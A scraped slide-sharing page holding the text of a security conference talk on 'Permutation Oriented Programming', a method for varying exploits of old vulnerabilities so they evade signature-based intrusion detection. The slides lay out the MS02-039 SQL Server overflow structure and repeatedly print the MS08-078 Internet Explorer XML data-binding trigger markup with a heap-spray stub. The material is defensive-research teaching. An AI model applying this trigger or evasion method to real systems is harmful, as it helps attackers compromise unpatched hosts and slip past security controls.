Top Application Security Trends of 2012
DaveEdwards12
 
PDF
Unit 08: Security for Web Applications
DSBW 2011/2002 - Carles Farré - Barcelona Tech
 
PPTX
Network Security Risk
Dedi Dwianto
 
PPTX
Vulnerability and Exploit Trends: Combining behavioral analysis and OS defens...
EndgameInc
 
PDF
Bilge12 zero day
Комсс Файквэе
 
PDF
Bilge12 zero day
Комсс Файквэе
 
PDF
Application Security Program Management with Vulnerability Manager
Denim Group
 
PPTX
AppSecEU2016-Amol-Sarwate-2016-State-of-Vulnerability-Exploits.pptx
EthioTelecom_Getahun Biratu
 
DOC
Web Hacking
agung sundoro
 
PPT
MIT-6-determina-vps.ppt
webhostingguy
 
PPTX
chap-1 : Vulnerabilities in Information Systems
KashfUlHuda1
 
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference
 
[PH-Neutral 0x7db] Exploit Next Generation®
Nelson Brito
 
Vulnerability Management In An Application Security World
Denim Group
 
B-Sides Seattle 2012 Offensive Defense
Stephan Chenette
 
Dan Guido SOURCE Boston 2011
Source Conference
 
Inception: Tips and tricks I’ve learned reversing vulnerabilities!
Nelson Brito
 
Software Security Engineering (Learnings from the past to fix the future) - B...
DebasisMohanty43
 
11th Website Security Statistics -- Presentation Slides (Q1 2011)
Jeremiah Grossman
 
Exploitation techniques and fuzzing
Prachi Gulihar
 
Top Application Security Trends of 2012
DaveEdwards12
 
Unit 08: Security for Web Applications
DSBW 2011/2002 - Carles Farré - Barcelona Tech
 
Network Security Risk
Dedi Dwianto
 
Vulnerability and Exploit Trends: Combining behavioral analysis and OS defens...
EndgameInc
 
Bilge12 zero day
Комсс Файквэе
 
Bilge12 zero day
Комсс Файквэе
 
Application Security Program Management with Vulnerability Manager
Denim Group
 
AppSecEU2016-Amol-Sarwate-2016-State-of-Vulnerability-Exploits.pptx
EthioTelecom_Getahun Biratu
 
Web Hacking
agung sundoro
 
MIT-6-determina-vps.ppt
webhostingguy
 
chap-1 : Vulnerabilities in Information Systems
KashfUlHuda1
 
Ad

More from SegInfo (8)

PDF
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
SegInfo
 
PDF
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
SegInfo
 
PDF
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
SegInfo
 
PDF
"War Games – O que aprender com eles?" por @rafaelsferreira
SegInfo
 
PDF
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
SegInfo
 
PDF
"How to track people using social media sites" por Thiago Bordini
SegInfo
 
PPT
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
SegInfo
 
PDF
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
SegInfo
 
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
SegInfo
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
SegInfo
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
SegInfo
 
"War Games – O que aprender com eles?" por @rafaelsferreira
SegInfo
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
SegInfo
 
"How to track people using social media sites" por Thiago Bordini
SegInfo
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
SegInfo
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
SegInfo
 

Recently uploaded (20)

PDF
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Enhancing emotion recognition model for a student engagement use case through...
IAESIJAI
 
PPTX
A Presentation on Touch Screen Technology
memembruh336
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PDF
DP Operators-handbook-extract for the Mautical Institute
LeonelMejiaLarios
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
August Patch Tuesday
Ivanti
 
PDF
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
ssuser28425f
 
PPTX
Chapter 5: Probability Theory and Statistics
RandyFin
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
project resource management chapter-09.pdf
ssuser00e6e21
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Enhancing emotion recognition model for a student engagement use case through...
IAESIJAI
 
A Presentation on Touch Screen Technology
memembruh336
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
DP Operators-handbook-extract for the Mautical Institute
LeonelMejiaLarios
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
August Patch Tuesday
Ivanti
 
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
ssuser28425f
 
Chapter 5: Probability Theory and Statistics
RandyFin
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 

"ENG++: Permutation Oriented Programming" por Nelson Brito

  • 2. Agenda • 0000 – Once upon a time… • 0100 – Advanced • 0001 – Introduction • 0101 – Demonstration • 0010 – Brain at work • 0110 – Conclusions • 0011 – Approach • 0111 – Questions and Answers
  • 3. nbrito@pitbull:~$ whoami • Nelson Brito: • Computer/Network Security Researcher Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • sekure SDI • Home town: • Rio de Janeiro • Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™ • WEB: • http://about.me/nbrito
  • 5. Once upon a time…
  • 7. Before starting 0-Day Pattern-matching • 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past, existence. but the security solution cannot rely only on this. • Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching 0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that released (which comes first). there is no vulnerability exploitation. • So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action… mitigated), 0-day has no more value. If you do not But what if the pattern is wrong? believe me, you can try to sell a well-known vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did not match, is the correct approach for a protection • Some security solutions fight against 0-day faster action? Was the detection really designed to detect than the affected vendor. the vulnerability?
  • 8. Some concepts Exploitation Vulnerability • There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation. you to look for them for a better understanding. • For some weakness types the vulnerability allows to • This lecture has no pretension of being a complete control the flow of software’s execution, executing reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE- 120, CWV-134, CWE-190, CWE-196, CWE-367, etc. • The exploitation path described here is something that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return vulnerabilities. address, etc…), performing memory manipulation on additional entities (such as: offset, register, • All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment, memory padding, etc). – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
  • 9. Current evasion techniques (a.k.a. TT) Techniques Tools • Packet fragmentation • Fragroute / Fragrouter / Sniffjoke • Stream segmentation • ADMutate / ALPHA[2-3] / BETA3 / Others • Byte and traffic insertion • Whisker / Nikto / Sandcat • Polymorphic shellcode • Snot / Stick / IDS-wakeup / Others • Denial of Service • Sidestep / RPC-evade-poc.pl / Others • URL obfuscation (+ SSL encryption) • Predator (AET) • RPC fragmentation • Etc… • HTML and JavaScript obfuscation • Etc…
  • 10. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
  • 11. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Harder: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
  • 12. What is Permutation Oriented Programming? The scenario The technique • Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching day faster than the affected vendor”. technology, there are two options: – Easier: know how the vulnerability is detected • This protection (mitigation) has a long life, and (access to signature/vaccine). sometimes the correct protection (patch) is not – Easier: know deeply how to trigger the applied. vulnerability and how to exploit it (access to vulnerable ecosystem). • People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, • Permutation Oriented Programming: no patch… – Deep analysis of a vulnerability, (re)searching for alternatives. • But what if an old and well-known vulnerability could – Use all the acquired knowledge and alternatives be exploited, even on this security approach model? to offer a variety of decision points (variants). – Intended to change the behavior of exploit • According to pattern-matching, any new variant of an developers. old vulnerability exploitation is considered a new – Use randomness to provide unpredictable vulnerability, because there is no pattern to be payloads, i.e., permutation. matched yet!
  • 13. POP (pronounced /pŏp/) technique The truth The examples • POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities: memory manipulation, rather than shellcode – it is – MS02-039: CVE-2002-0649/CWE-120. neither a new polymorphic shellcode technique, nor – MS02-056: CVE-2002-1123/CWE-120. an obfuscation technique. • Client-side vulnerabilities: • POP technique can be applied to work with Rapid7 Metasploit Framework, CORE Impact Pro, Immunity – MS08-078: CVE-2008-4844/CWE-367. CANVAS Professional, and regular stand-alone – MS09-002: CVE-2009-0075/CWE-367. proof-of-concepts (freestyle coding). • Windows 32-bit shellcodes: • POP technique is neither an additional entropy for – 波動拳: “CMD /k”. tools mentioned above, nor an Advanced Evasion – 昇龍拳: “CMD /k set DIRCMD=/b”. Technique (AET). Instead, POP technique can empower both of them. • All example modules were ported to work with Rapid7 Metasploit Framework, but there are also • POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript. even using random decisions, it is able to achieve all exploitation requirements.
  • 14. What if… exploit #1
  • 15. What if… exploit #1 exploit #2
  • 16. What if… exploit #1 exploit #N exploit #2
  • 17. What if… exploit #1 exploit #N exploit #2 shared zone
  • 18. What if… exploit #1 exploit #N exploit #2 shared zone
  • 19. What if… exploit #1 exploit #N exploit #2 shared zone Permutation Oriented Programming
  • 21. Vulnerabilities MS02-039 MS08-078 • Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures: – CVE-2002-0649. – CVE-2008-4844. • Common Weakness Enumeration: • Common Weakness Enumeration: – CWE-120. – CWE-367. • CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH). • Target: • Target: – Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2. • Vulnerable ecosystem: – Protocol UDP. • Vulnerable ecosystem: – Communication Port 1434. – DHTML with embedded Data binding. – SQL Request CLNT_UCAST_INST. – XML Data Source Object (DSO). – INSTANCENAME >= 96 bytes. – Data Consumer (HTML element) pointing to a – INSTANCENAME != NULL. dereferenced XML DSO.
  • 25. CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 26. memory manipulation vulnerability CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 27. memory manipulation vulnerability memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 28. memory manipulation vulnerability 0x04 request memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 29. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename memory stack CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 30. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 31. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 32. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 33. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump address padding additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 34. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 35. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 36. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 37. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 38. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 39. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 40. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 41. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 42. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 43. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 44. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 45. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 46. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 47. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 50. <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 51. memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 52. memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 53. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 54. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 55. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 56. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 57. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 58. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 59. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 60. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 61. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 62. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 63. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 64. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 65. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 66. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 67. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 68. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 69. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 70. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
